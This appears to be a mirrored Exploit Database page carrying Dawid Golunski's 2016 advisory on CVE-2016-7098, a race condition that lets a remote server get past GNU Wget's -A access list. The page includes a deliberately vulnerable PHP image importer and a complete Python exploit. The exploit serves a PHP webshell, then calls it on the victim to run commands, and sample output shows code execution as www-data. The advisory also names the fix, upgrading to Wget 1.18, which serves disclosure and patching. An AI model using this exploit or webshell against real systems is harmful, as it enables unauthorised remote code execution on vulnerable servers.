GNU Wget < 1.18 - Access List Bypass / Race Condition

• Exploit Database
• 101 阅读

• 作者： Dawid Golunski
  日期： 2016-11-24
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/40824/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332

  &apos;&apos;&apos; ============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html   - CVE-2016-7098 - Release date: 24.11.2016 - Revision 1.0 - Severity: Medium =============================================     I. VULNERABILITY -------------------------   GNU Wget < 1.18 Access List Bypass / Race Condition     II. BACKGROUND -------------------------   "GNU Wget is a free software package for retrieving files using HTTP, HTTPS and FTP, the most widely-used Internet protocols. It is a non-interactive commandline tool, so it may easily be called from scripts, cron jobs, terminals without X-Windows support, etc.   GNU Wget has many features to make retrieving large files or mirroring entire web or FTP sites easy "   https://www.gnu.org/software/wget/     III. INTRODUCTION -------------------------   GNU wget in version 1.17 and earlier, when used in mirroring/recursive mode, is affected by a Race Condition vulnerability that might allow remote attackers to bypass intended wget access list restrictions specified with -A parameter. This might allow attackers to place malicious/restricted files onto the system. Depending on the application / download directory, this could potentially lead to other vulnerabilities such as code execution etc.     IV. DESCRIPTION -------------------------   When wget is used in recursive/mirroring mode, according to the manual it can take the following access list options:   "Recursive Accept/Reject Options: -A acclist --accept acclist -R rejlist --reject rejlist   Specify comma-separated lists of file name suffixes or patterns to accept or reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in an element of acclist or rejlist, it will be treated as a pattern, rather than a suffix."     These can for example be used to only download JPG images.   It was however discovered that when a single file is requested with recursive option (-r / -m) and an access list ( -A ), wget only applies the checks at the end of the download process.   This can be observed in the output below:   # wget -r -nH -A &apos;*.jpg&apos; http://attackersvr/test.php Resolving attackersvr... 192.168.57.1 Connecting to attackersvr|192.168.57.1|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/plain] Saving to: ‘test.php’   15:05:46 (27.3 B/s) - ‘test.php’ saved [52]   Removing test.php since it should be rejected.   FINISHED     Although wget deletes the file at the end of the download process, this creates a race condition as an attacker with control over the URL/remote server could intentionally slow down the download process so that they had a chance to make use of the malicious file before it gets deleted.   It is very easy to win the race as the file only gets deleted after the HTTP connection is terminated. The attacker could therefore keep the connection open as long as it was necessary to make use of the uploaded file as demonstrated in the proof of concept below.     V. PROOF OF CONCEPT EXPLOIT ------------------------------     Here is a simple vulnerable PHP web application that uses wget to download images from a user-provided server/URL:     ---[ image_importer.php ]---   <?php // Vulnerable webapp [image_importer.php] // Uses wget to import user images from provided site URL // It only accepts JPG files (-A wget option).   if ( isset($_GET[&apos;imgurl&apos;]) ) { $URL = escapeshellarg($_GET[&apos;imgurl&apos;]); } else { die("imgurl parameter missing"); }   if ( !file_exists("image_uploads") ) { mkdir("image_uploads"); }   // Download user JPG images into /image_uploads directory system("wget -r -nH -P image_uploads -A &apos;*.jpg&apos; $URL 2>&1"); ?>     ----------------------------     For example: https://victimsvr/image_importer.php?imgurl= href="http://images/logo.jpg">http://images/logo.jpg   will cause wget to upload logo.jpg file into: https://victimsvr/images_uploads/logo.jpg   The wget access list (-A) is to ensure that only .jpg files get uploaded.   However due to the wget race condition vulnerability an attacker could use the exploit below to upload an arbitrary PHP script to /image_uploads directory and achieve code execution.     ---[ wget-race-exploit.py ]--- &apos;&apos;&apos;   #!/usr/bin/env python   # # Wget < 1.18Access List Bypass / Race Condition PoC Exploit # CVE-2016-7098 # # Dawid Golunski # https://legalhackers.com # # # This PoC wget exploit can be used to bypass wget -A access list and upload a malicious # file for long enough to take advantage of it. # The exploit sets up a web server on port 80 and waits for a download request from wget. # It then supplies a PHP webshell payload and requests the uploaded file before it gets # removed by wget. # # Adjust target URL (WEBSHELL_URL) before executing. # # Full advisory at: # # https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html # # Disclaimer: # # For testing purposes only. Do no harm. # #   import SimpleHTTPServer import time import SocketServer import urllib2 import sys   HTTP_LISTEN_IP = &apos;0.0.0.0&apos; HTTP_LISTEN_PORT = 80   PAYLOAD=&apos;&apos;&apos; <?php //our webshell system($_GET["cmd"]); system("touch /tmp/wgethack"); ?> &apos;&apos;&apos;   # Webshell URL to be requested before the connection is closed # i.e before the uploaded "temporary" file gets removed. WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"   # Command to be executed through &apos;cmd&apos; GET paramter of the webshell CMD="/usr/bin/id"     class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): # Send the payload on GET request print "[+] Got connection from wget requesting " + self.path + " via GET :)\n" self.send_response(200) self.send_header(&apos;Content-type&apos;, &apos;text/plain&apos;) self.end_headers() self.wfile.write(PAYLOAD) print "\n[+] PHP webshell payload was sent.\n"   # Wait for the file to be flushed to disk on remote host etc. print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n" time.sleep(2)   # Request uploaded webshell print "[+} File &apos;" + self.path + "&apos; should be saved by now :)\n" print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n" print "[+} Command result: " print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()   print "[+} All done. Closing HTTP connection...\n" # Connection will be closed on request handler return return   handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)   print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n" print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT   handler.serve_forever()   &apos;&apos;&apos; ------------------------------   If the attacker run this exploit on their server (&apos;attackersver&apos;) and pointed the vulnerable script image_importer.php at it via URL:   https://victimsvr/image_importer.php?imgurl= href="http://attackersvr/webshell.php">http://attackersvr/webshell.php   The attacker will see output similar to:       root@attackersvr:~# ./wget-race-exploit.py   Wget < 1.18 Access List Bypass / Race Condition PoC Exploit CVE-2016-7098   Dawid Golunski https://legalhackers.com   [+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...   [+] Got connection from wget requesting /webshell.php via GET :)   victimsvr - - [24/Nov/2016 00:46:18] "GET /webshell.php HTTP/1.1" 200 -   [+] PHP webshell payload was sent.   [+} Sleep for 2s to make sure the file has been flushed to the disk on the target...   [+} File &apos;/webshell.php&apos; should be saved by now :)   [+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id   [+} Command result:   uid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)   [+} All done. Closing HTTP connection...       VI. BUSINESS IMPACT -------------------------   The vulnerability might allow remote servers to bypass intended wget access list restrictions to temporarily store a malicious file on the server. In certain cases, depending on the context wget command was used in and download path, this issue could potentially lead to other vulnerabilities such as script execution as shown in the PoC section. VII. SYSTEMS AFFECTED -------------------------   Wget < 1.18 VIII. SOLUTION -------------------------   Update to latest version of wget 1.18 or apply patches provided by the vendor. IX. REFERENCES -------------------------   https://legalhackers.com   https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html   https://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py   https://www.gnu.org/software/wget/   https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098   https://security-tracker.debian.org/tracker/CVE-2016-7098   http://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html   http://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098     X. CREDITS -------------------------   The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com   https://legalhackers.com XI. REVISION HISTORY -------------------------   24.11.2016 - Advisory released XII. LEGAL NOTICES -------------------------   The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. &apos;&apos;&apos;